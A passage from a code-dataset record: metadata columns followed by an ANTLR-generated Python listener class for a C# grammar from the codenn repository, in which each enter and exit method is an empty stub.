hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ec1b0a6c07baa25a343acad5549dc79f1f5d09a4 | 108,115 | py | Python | src/csharp/CSharp4Listener.py | slash-under/codenn | 747a7c5c6788256cdb1564d0936b5ea91f43ba6c | [
"MIT"
] | 216 | 2016-06-28T18:44:28.000Z | 2022-03-26T10:24:03.000Z | src/csharp/CSharp4Listener.py | slash-under/codenn | 747a7c5c6788256cdb1564d0936b5ea91f43ba6c | [
"MIT"
] | 17 | 2016-07-22T23:43:27.000Z | 2021-06-09T16:36:54.000Z | src/csharp/CSharp4Listener.py | slash-under/codenn | 747a7c5c6788256cdb1564d0936b5ea91f43ba6c | [
"MIT"
] | 86 | 2016-07-02T06:56:31.000Z | 2021-09-14T06:24:46.000Z | # Generated from ./CSharp4.g4 by ANTLR 4.5.2
from antlr4 import *
# This class defines a complete listener for a parse tree produced by CSharp4Parser.
class CSharp4Listener(ParseTreeListener):
# Enter a parse tree produced by CSharp4Parser#namespace_name.
def enterNamespace_name(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_name.
def exitNamespace_name(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_name.
def enterType121_name(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_name.
def exitType121_name(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#identifier.
def enterIdentifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#identifier.
def exitIdentifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#namespace_or_type121_name.
def enterNamespace_or_type121_name(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_or_type121_name.
def exitNamespace_or_type121_name(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_argument_list_opt.
def enterType121_argument_list_opt(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_argument_list_opt.
def exitType121_argument_list_opt(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121.
def enterType121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121.
def exitType121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#base_type121.
def enterBase_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#base_type121.
def exitBase_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#simple_type121.
def enterSimple_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#simple_type121.
def exitSimple_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#numeric_type121.
def enterNumeric_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#numeric_type121.
def exitNumeric_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#integral_type121.
def enterIntegral_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#integral_type121.
def exitIntegral_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#floating_point_type121.
def enterFloating_point_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#floating_point_type121.
def exitFloating_point_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#nullable_type121.
def enterNullable_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#nullable_type121.
def exitNullable_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#non_nullable_value_type121.
def enterNon_nullable_value_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#non_nullable_value_type121.
def exitNon_nullable_value_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#reference_type121.
def enterReference_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#reference_type121.
def exitReference_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#class_type121.
def enterClass_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#class_type121.
def exitClass_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_type121.
def enterInterface_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_type121.
def exitInterface_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_type121.
def enterDelegate_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_type121.
def exitDelegate_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_argument_list.
def enterType121_argument_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_argument_list.
def exitType121_argument_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_arguments.
def enterType121_arguments(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_arguments.
def exitType121_arguments(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_argument.
def enterType121_argument(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_argument.
def exitType121_argument(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_void.
def enterType121_void(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_void.
def exitType121_void(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#variable_reference.
def enterVariable_reference(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#variable_reference.
def exitVariable_reference(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#argument_list.
def enterArgument_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#argument_list.
def exitArgument_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#argument.
def enterArgument(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#argument.
def exitArgument(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#argument_name.
def enterArgument_name(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#argument_name.
def exitArgument_name(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#argument_value.
def enterArgument_value(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#argument_value.
def exitArgument_value(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#primary_expression.
def enterPrimary_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#primary_expression.
def exitPrimary_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#primary_expression_start.
def enterPrimary_expression_start(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#primary_expression_start.
def exitPrimary_expression_start(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#bracket_expression.
def enterBracket_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#bracket_expression.
def exitBracket_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#simple_name.
def enterSimple_name(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#simple_name.
def exitSimple_name(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#parenthesized_expression.
def enterParenthesized_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#parenthesized_expression.
def exitParenthesized_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#member_access.
def enterMember_access(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#member_access.
def exitMember_access(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#predefined_type121.
def enterPredefined_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#predefined_type121.
def exitPredefined_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#expression_list.
def enterExpression_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#expression_list.
def exitExpression_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#this_access.
def enterThis_access(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#this_access.
def exitThis_access(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#base_access.
def enterBase_access(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#base_access.
def exitBase_access(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#object_creation_expression.
def enterObject_creation_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#object_creation_expression.
def exitObject_creation_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#object_or_collection_initializer.
def enterObject_or_collection_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#object_or_collection_initializer.
def exitObject_or_collection_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#object_initializer.
def enterObject_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#object_initializer.
def exitObject_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#member_initializer_list.
def enterMember_initializer_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#member_initializer_list.
def exitMember_initializer_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#member_initializer.
def enterMember_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#member_initializer.
def exitMember_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#initializer_value.
def enterInitializer_value(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#initializer_value.
def exitInitializer_value(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#collection_initializer.
def enterCollection_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#collection_initializer.
def exitCollection_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#element_initializer_list.
def enterElement_initializer_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#element_initializer_list.
def exitElement_initializer_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#element_initializer.
def enterElement_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#element_initializer.
def exitElement_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#array_creation_expression.
def enterArray_creation_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#array_creation_expression.
def exitArray_creation_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_creation_expression.
def enterDelegate_creation_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_creation_expression.
def exitDelegate_creation_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#anonymous_object_creation_expression.
def enterAnonymous_object_creation_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#anonymous_object_creation_expression.
def exitAnonymous_object_creation_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#anonymous_object_initializer.
def enterAnonymous_object_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#anonymous_object_initializer.
def exitAnonymous_object_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#member_declarator_list.
def enterMember_declarator_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#member_declarator_list.
def exitMember_declarator_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#member_declarator.
def enterMember_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#member_declarator.
def exitMember_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121of_expression.
def enterType121of_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121of_expression.
def exitType121of_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#unbound_type121_name.
def enterUnbound_type121_name(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#unbound_type121_name.
def exitUnbound_type121_name(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#generic_dimension_specifier.
def enterGeneric_dimension_specifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#generic_dimension_specifier.
def exitGeneric_dimension_specifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#commas.
def enterCommas(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#commas.
def exitCommas(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#checked_expression.
def enterChecked_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#checked_expression.
def exitChecked_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#unchecked_expression.
def enterUnchecked_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#unchecked_expression.
def exitUnchecked_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#default_value_expression.
def enterDefault_value_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#default_value_expression.
def exitDefault_value_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#unary_expression.
def enterUnary_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#unary_expression.
def exitUnary_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#scan_for_cast_generic_precedence.
def enterScan_for_cast_generic_precedence(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#scan_for_cast_generic_precedence.
def exitScan_for_cast_generic_precedence(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#cast_disambiguation_token.
def enterCast_disambiguation_token(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#cast_disambiguation_token.
def exitCast_disambiguation_token(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#pre_increment_expression.
def enterPre_increment_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#pre_increment_expression.
def exitPre_increment_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#pre_decrement_expression.
def enterPre_decrement_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#pre_decrement_expression.
def exitPre_decrement_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#cast_expression.
def enterCast_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#cast_expression.
def exitCast_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#multiplicative_expression.
def enterMultiplicative_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#multiplicative_expression.
def exitMultiplicative_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#additive_expression.
def enterAdditive_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#additive_expression.
def exitAdditive_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#shift_expression.
def enterShift_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#shift_expression.
def exitShift_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#relational_expression.
def enterRelational_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#relational_expression.
def exitRelational_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#scan_for_shift_generic_precedence.
def enterScan_for_shift_generic_precedence(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#scan_for_shift_generic_precedence.
def exitScan_for_shift_generic_precedence(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#shift_disambiguation_token.
def enterShift_disambiguation_token(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#shift_disambiguation_token.
def exitShift_disambiguation_token(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#istype121.
def enterIstype121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#istype121.
def exitIstype121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#is_disambiguation_token.
def enterIs_disambiguation_token(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#is_disambiguation_token.
def exitIs_disambiguation_token(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#equality_expression.
def enterEquality_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#equality_expression.
def exitEquality_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#and_expression.
def enterAnd_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#and_expression.
def exitAnd_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#exclusive_or_expression.
def enterExclusive_or_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#exclusive_or_expression.
def exitExclusive_or_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#inclusive_or_expression.
def enterInclusive_or_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#inclusive_or_expression.
def exitInclusive_or_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#conditional_and_expression.
def enterConditional_and_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#conditional_and_expression.
def exitConditional_and_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#conditional_or_expression.
def enterConditional_or_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#conditional_or_expression.
def exitConditional_or_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#null_coalescing_expression.
def enterNull_coalescing_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#null_coalescing_expression.
def exitNull_coalescing_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#conditional_expression.
def enterConditional_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#conditional_expression.
def exitConditional_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#lambda_expression.
def enterLambda_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#lambda_expression.
def exitLambda_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#anonymous_method_expression.
def enterAnonymous_method_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#anonymous_method_expression.
def exitAnonymous_method_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#anonymous_function_signature.
def enterAnonymous_function_signature(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#anonymous_function_signature.
def exitAnonymous_function_signature(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#explicit_anonymous_function_signature.
def enterExplicit_anonymous_function_signature(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#explicit_anonymous_function_signature.
def exitExplicit_anonymous_function_signature(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#explicit_anonymous_function_parameter_list.
def enterExplicit_anonymous_function_parameter_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#explicit_anonymous_function_parameter_list.
def exitExplicit_anonymous_function_parameter_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#explicit_anonymous_function_parameter.
def enterExplicit_anonymous_function_parameter(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#explicit_anonymous_function_parameter.
def exitExplicit_anonymous_function_parameter(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#anonymous_function_parameter_modifier.
def enterAnonymous_function_parameter_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#anonymous_function_parameter_modifier.
def exitAnonymous_function_parameter_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#implicit_anonymous_function_signature.
def enterImplicit_anonymous_function_signature(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#implicit_anonymous_function_signature.
def exitImplicit_anonymous_function_signature(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#implicit_anonymous_function_parameter_list.
def enterImplicit_anonymous_function_parameter_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#implicit_anonymous_function_parameter_list.
def exitImplicit_anonymous_function_parameter_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#implicit_anonymous_function_parameter.
def enterImplicit_anonymous_function_parameter(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#implicit_anonymous_function_parameter.
def exitImplicit_anonymous_function_parameter(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#anonymous_function_body.
def enterAnonymous_function_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#anonymous_function_body.
def exitAnonymous_function_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#query_expression.
def enterQuery_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#query_expression.
def exitQuery_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#from_clause.
def enterFrom_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#from_clause.
def exitFrom_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#query_body.
def enterQuery_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#query_body.
def exitQuery_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#query_body_clauses.
def enterQuery_body_clauses(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#query_body_clauses.
def exitQuery_body_clauses(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#query_body_clause.
def enterQuery_body_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#query_body_clause.
def exitQuery_body_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#let_clause.
def enterLet_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#let_clause.
def exitLet_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#where_clause.
def enterWhere_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#where_clause.
def exitWhere_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#join_clause.
def enterJoin_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#join_clause.
def exitJoin_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#join_into_clause.
def enterJoin_into_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#join_into_clause.
def exitJoin_into_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#combined_join_clause.
def enterCombined_join_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#combined_join_clause.
def exitCombined_join_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#orderby_clause.
def enterOrderby_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#orderby_clause.
def exitOrderby_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#orderings.
def enterOrderings(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#orderings.
def exitOrderings(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#ordering.
def enterOrdering(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#ordering.
def exitOrdering(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#ordering_direction.
def enterOrdering_direction(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#ordering_direction.
def exitOrdering_direction(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#select_or_group_clause.
def enterSelect_or_group_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#select_or_group_clause.
def exitSelect_or_group_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#select_clause.
def enterSelect_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#select_clause.
def exitSelect_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#group_clause.
def enterGroup_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#group_clause.
def exitGroup_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#query_continuation.
def enterQuery_continuation(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#query_continuation.
def exitQuery_continuation(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#assignment.
def enterAssignment(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#assignment.
def exitAssignment(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#assignment_operator.
def enterAssignment_operator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#assignment_operator.
def exitAssignment_operator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#expression.
def enterExpression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#expression.
def exitExpression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#non_assignment_expression.
def enterNon_assignment_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#non_assignment_expression.
def exitNon_assignment_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constant_expression.
def enterConstant_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constant_expression.
def exitConstant_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#boolean_expression.
def enterBoolean_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#boolean_expression.
def exitBoolean_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#statement.
def enterStatement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#statement.
def exitStatement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#embedded_statement.
def enterEmbedded_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#embedded_statement.
def exitEmbedded_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#simple_embedded_statement.
def enterSimple_embedded_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#simple_embedded_statement.
def exitSimple_embedded_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#block.
def enterBlock(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#block.
